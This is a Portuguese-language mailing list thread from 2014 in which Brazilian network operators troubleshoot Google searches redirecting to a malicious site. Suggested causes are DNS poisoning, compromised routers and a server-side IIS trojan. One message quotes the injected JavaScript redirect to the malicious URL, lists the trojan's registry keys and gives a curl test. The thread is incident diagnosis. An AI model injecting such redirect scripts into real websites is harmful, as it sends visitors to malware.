[caiu] RES: Google
Felipe Olivaes
felipe.olivaes em gmail.com
Quarta Abril 9 14:31:00 BRT 2014
Existe um trojan novo lado do servidor que faz um redirecionamento para
alguma URL através do referer.
Achei um servidor que 1 servidor afetado com IIS 6.
Quando o site bate no IIS com referer do GOOGLE no primeiro acesso,
redireciona para:
<script>window.location.href='http://www.ergobaby.me.uk/getad.html?id=9736'
;</script>
No segundo acesso, acessa o site normalmente.
Verifiquei que o armazenamento dos ips que acessaram fica no registro em:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CLIENT_IP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\DAY_IP\
Página de redirecionamento:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\advert
Como testar:
curl --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
--referer "http://www.google.com" "http://DOMINIO/"
Em 9 de abril de 2014 14:28, Rubens Kuhl <rubensk at gmail.com> escreveu:
> Apesar de terem citado DNS, e isso ser possível, os redirecionamentos mais
> comuns que tenho visto são feitos por malware instalados nas próprias
> máquinas. Eu checaria isso primeiro...
>
> Rubens
>
>
>
> 2014-04-09 14:09 GMT-03:00 Gabriel Soares <sousasgabriel at gmail.com>:
>
> > Alguém acessando um site através da pesquisa do google e sendo
> > redirecionado para uma URL chamada ergobaby.me.uk?
> >
> > Em 09-04-2014 14:04, Jean Carlos Bartzen escreveu:
> >
> > mesma situação que ocorreu aqui
> >>
> >>
> >> Em 9 de abril de 2014 14:02, Eli Martins <eli at netinfobrasil.com.br>
> >> escreveu:
> >>
> >> No meu caso era um Router com APRouter, resetei para default e mudei a
> >>> senha root resolveu
> >>>
> >>>
> >>> Em 9 de abril de 2014 13:45, Carlos Alberto P. Cunha <
> >>> carlos at viaconnect.com.br> escreveu:
> >>>
> >>> Tudo Indica sem algum envenenamento de DNS com ja mencionando, tentou
> o
> >>>> que o pessoal disse??
> >>>>
> >>>> Abraço
> >>>> Carlos A. P. Cunha
> >>>>
> >>>> ----- Mensagem original -----
> >>>> De: diegocanton at ensite.com.br
> >>>> Para: "Lista das indisponibilidades da Internet brasileira" <
> >>>> caiu at eng.registro.br>
> >>>> Enviadas: Quarta-feira, 9 de abril de 2014 13:05:38
> >>>> Assunto: [caiu] RES: Google
> >>>>
> >>>> Tentem resetar modem/Rádio/Roteador.
> >>>>
> >>>> Esse é um caso clássico de um malware que se espalha por SSH em
> >>>> equipamentos
> >>>> com senha padrão. As primeiras versões atingiam modem adsl,
> recentemente
> >>>> tem
> >>>> atingido equipamentos ubiquiti e variantes do aprouter.
> >>>>
> >>>> Att,
> >>>>
> _______________________________________________________________________
> >>>>
> >>>>
> >>>>
> >>>> -----Mensagem original-----
> >>>> De: caiu-bounces at eng.registro.br [mailto:caiu-bounces at eng.registro.br
> ]
> >>>>
> >>> Em
> >>>
> >>>> nome de Noc FBA
> >>>> Enviada em: quarta-feira, 9 de abril de 2014 11:51
> >>>> Para: Lista das indisponibilidades da Internet brasileira
> >>>> Assunto: Re: [caiu] Google
> >>>>
> >>>> Utilizamos nosso próprio servidor DNS, na arquitetura Linux BIND .
> >>>>
> >>>>
> >>>> Em 9 de abril de 2014 11:48, Guilherme Boing <kolt at frag.com.br>
> >>>>
> >>> escreveu:
> >>>
> >>>> Certamente seu DNS está sendo manipulado pra lhe enviar pra um
> >>>>> servidor terceiro, como o Diego comentou.
> >>>>>
> >>>>>
> >>>>> 2014-04-09 11:18 GMT-03:00 Eli Martins <eli at netinfobrasil.com.br>:
> >>>>>
> >>>>> Ele depe pra baixar o Flashplayer e o NOD diz que é um virus
> >>>>>>
> >>>>>>
> >>>>>> Em 9 de abril de 2014 10:59, Diego Canton De Brito <
> >>>>>> diegocanton at ensite.com.br> escreveu:
> >>>>>>
> >>>>>> Bom dia,
> >>>>>>>
> >>>>>>> Primeiramente qual é o comportamento? Não foi descrito.
> >>>>>>>
> >>>>>>> Normal via GGC local.
> >>>>>>>
> >>>>>>>
> >>>>>>> Enviado por Samsung Mobile
> >>>>>>>
> >>>>>>> -------- Mensagem original -------- De : Eli Martins
> >>>>>>> <eli at netinfobrasil.com.br>
> >>>>>>> Data:09/04/2014 10:17 (GMT-03:00)
> >>>>>>> Para: Lista das indisponibilidades da Internet brasileira <
> >>>>>>> caiu at eng.registro.br>
> >>>>>>> Assunto: [caiu] Google
> >>>>>>>
> >>>>>>> Bom dia,
> >>>>>>>
> >>>>>>> alguem com este comportamento do google.com.br
> >>>>>>>
> >>>>>>>
> >>>>>>> --
> >>>>>>> Eli A. Martins
> >>>>>>> 15 99756 1743
> >>>>>>> eli at netinfobrasil.com.br
> >>>>>>> skype elimartins
> >>>>>>>
> >>>>>>> _______________________________________________
> >>>>>>> caiu mailing list
> >>>>>>> caiu at eng.registro.br
> >>>>>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>>>>
> >>>>>>>
> >>>>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>>>>
> >>>>>>> https://eng.registro.br/mailman/options/caiu
> >>>>>>> _______________________________________________
> >>>>>>> caiu mailing list
> >>>>>>> caiu at eng.registro.br
> >>>>>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>>>>
> >>>>>>>
> >>>>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>>>>
> >>>>>>> https://eng.registro.br/mailman/options/caiu
> >>>>>>>
> >>>>>>>
> >>>>>>
> >>>>>> --
> >>>>>> Eli A. Martins
> >>>>>> 15 99756 1743
> >>>>>> eli at netinfobrasil.com.br
> >>>>>> skype elimartins
> >>>>>> _______________________________________________
> >>>>>> caiu mailing list
> >>>>>> caiu at eng.registro.br
> >>>>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>>>
> >>>>>>
> >>>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>>>
> >>>>>> https://eng.registro.br/mailman/options/caiu
> >>>>>>
> >>>>>> _______________________________________________
> >>>>> caiu mailing list
> >>>>> caiu at eng.registro.br
> >>>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>>
> >>>>>
> >>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>>
> >>>>> https://eng.registro.br/mailman/options/caiu
> >>>>>
> >>>>> _______________________________________________
> >>>> caiu mailing list
> >>>> caiu at eng.registro.br
> >>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>
> >>>>
> >>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>
> >>>> https://eng.registro.br/mailman/options/caiu
> >>>>
> >>>> _______________________________________________
> >>>> caiu mailing list
> >>>> caiu at eng.registro.br
> >>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>
> >>>>
> >>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>
> >>>> https://eng.registro.br/mailman/options/caiu
> >>>> _______________________________________________
> >>>> caiu mailing list
> >>>> caiu at eng.registro.br
> >>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>
> >>>>
> >>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>
> >>>> https://eng.registro.br/mailman/options/caiu
> >>>>
> >>>>
> >>>
> >>> --
> >>> Eli A. Martins
> >>> 15 99756 1743
> >>> eli at netinfobrasil.com.br
> >>> skype elimartins
> >>> _______________________________________________
> >>> caiu mailing list
> >>> caiu at eng.registro.br
> >>> https://eng.registro.br/mailman/listinfo/caiu
> >>>
> >>>
> >>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>
> >>> https://eng.registro.br/mailman/options/caiu
> >>>
> >>>
> >>
> >>
> > _______________________________________________
> > caiu mailing list
> > caiu at eng.registro.br
> > https://eng.registro.br/mailman/listinfo/caiu
> >
> >
> > --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >
> > https://eng.registro.br/mailman/options/caiu
> >
> _______________________________________________
> caiu mailing list
> caiu at eng.registro.br
> https://eng.registro.br/mailman/listinfo/caiu
>
>
> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
>
> https://eng.registro.br/mailman/options/caiu
>
More information about the caiu
mailing list